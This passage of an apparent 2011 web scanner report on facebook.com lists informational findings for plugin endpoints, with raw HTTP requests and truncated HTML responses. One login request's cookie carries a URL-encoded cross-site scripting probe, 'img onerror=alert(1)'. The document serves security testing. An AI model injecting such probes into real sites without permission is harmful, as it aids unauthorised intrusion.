Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<span title="HPHP - 32 - mgPDmzsdYFCKizW2qn8cqg - 700800"> Facebook .. 2011</span></div></div><div class="rfloat fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile?ref=pf" title="Check out Facebook Mobile.">Mobile</a> .. <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> .. <a href="http://www.facebook.com/badges?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> .. <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> .. <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> .. <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> .. <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Advertising</a> .. <a href="/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> .. <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> .. <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> .. <a href="http://www.facebook.com/privacy/explanation.php" title="Learn about your privacy and Facebook.">Privacy</a> .. <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Review our terms of service.">Terms</a> .. 
<a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=1862"+"&m="+m;},5000);}if(top!=self){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","\/pages\/","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_c
...[SNIP]...

Request 2

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:44:29 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.90.109
X-Cnection: close
Date: Thu, 05 May 2011 11:44:29 GMT
Content-Length: 16170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<span title="HPHP - 28 - A4EgTgbQu_CnxsU1RWP61A - 631168"> Facebook .. 2011</span></div></div><div class="rfloat fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile?ref=pf" title="Check out Facebook Mobile.">Mobile</a> .. <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> .. <a href="http://www.facebook.com/badges?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> .. <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> .. <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> .. <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> .. <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Advertising</a> .. <a href="/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> .. <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> .. <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> .. <a href="http://www.facebook.com/privacy/explanation.php" title="Learn about your privacy and Facebook.">Privacy</a> .. <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Review our terms of service.">Terms</a> .. 
<a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=7966"+"&m="+m;},5000);}if(top!=self){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","\/pages\/","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_c
...[SNIP]...

14.4. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Request 1

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.136.27
X-Cnection: close
Date: Thu, 05 May 2011 02:10:56 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u145696_1" class="fbConnectWidgetTopmost " style="height:238px; width:258px; border-color:#ffffff;font-family:&quot;arial&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="aol.sportingnews.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u145696_3"><input value="Sign Up" type="submit" id="u145696_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u145696_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u145696_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_1e7deb6cdc67f922"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" title="Rooney responds to Mendenhall&#039;s tweets about bin Laden" target="_top"><img class="img" src="http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" 
href="http://www.sportingnews.com/nfl/s
...[SNIP]...

Request 2

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.39
X-Cnection: close
Date: Thu, 05 May 2011 02:11:44 GMT
Content-Length: 11840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u150408_1" class="fbConnectWidgetTopmost " style="height:238px; width:258px; border-color:#ffffff;font-family:&quot;arial&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u150408_3"><input value="Sign Up" type="submit" id="u150408_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u150408_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u150408_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_4af4af5eab916049"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" title="Rooney responds to Mendenhall&#039;s tweets about bin Laden" target="_top"><img class="img" src="http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" target="_top">Rooney responds to Mendenhall&#039;s tweets about 
bin Laden</a>
...[SNIP]...

14.5. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.112.63
X-Cnection: close
Date: Thu, 05 May 2011 00:57:35 GMT
Content-Length: 11323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"458a346a",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:374220,vip:"66.220.149.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"c4dbd",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc1f5ff4e0284f94444630" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Former NHL Enforcer Donald Brashear to Fight at Ringside MMA 11</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_spa
...[SNIP]...

Request 2

GET /plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.123.25
X-Cnection: close
Date: Thu, 05 May 2011 00:57:47 GMT
Content-Length: 10935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"c065edb4",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:374220,vip:"66.220.149.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"c4dbd",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc1f60b4c3656148685263" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Former NHL Enforcer Donald Brashear to Fight at Ringside MMA 11</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_spa
...[SNIP]...

14.6. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.79
X-Cnection: close
Date: Thu, 05 May 2011 00:59:40 GMT
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u718044_1" class="fbConnectWidgetTopmost" style="height:178px; width:296px; "><div class="mhs pvm phs ConnectActivityLogin hidden_elem uiBoxWhite"><label class="mrm fbLoginButton uiButton uiButtonConfirm uiButtonLarge" for="u718044_2"><input value="Login" onclick="ConnectSocialWidget.getInstance(&quot;u718044_1&quot;).login();" type="submit" id="u718044_2" /></label><div class="ConnectActivityLoginMessage"></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/sportingnews" target="_blank"><span class="name">Sporting News</span> on Facebook</a></div><div><div id="connect_widget_4dc1f67c6bfb85338573224" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Sporting News</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_admin_option">Admin Page</a
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.103.75
X-Cnection: close
Date: Thu, 05 May 2011 01:00:29 GMT
Content-Length: 16111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u722997_1" class="fbConnectWidgetTopmost" style="height:178px; width:296px; "><div class="mhs pvm phs ConnectActivityLogin hidden_elem uiBoxWhite"><label class="mrm fbLoginButton uiButton uiButtonConfirm uiButtonLarge" for="u722997_2"><input value="Login" onclick="ConnectSocialWidget.getInstance(&quot;u722997_1&quot;).login();" type="submit" id="u722997_2" /></label><div class="ConnectActivityLoginMessage"></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/sportingnews" target="_blank"><span class="name">Sporting News</span> on Facebook</a></div><div><div id="connect_widget_4dc1f6adee0900c26451834" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Sporting News</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_admin_option">Admin Page</a
...[SNIP]...

14.7. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
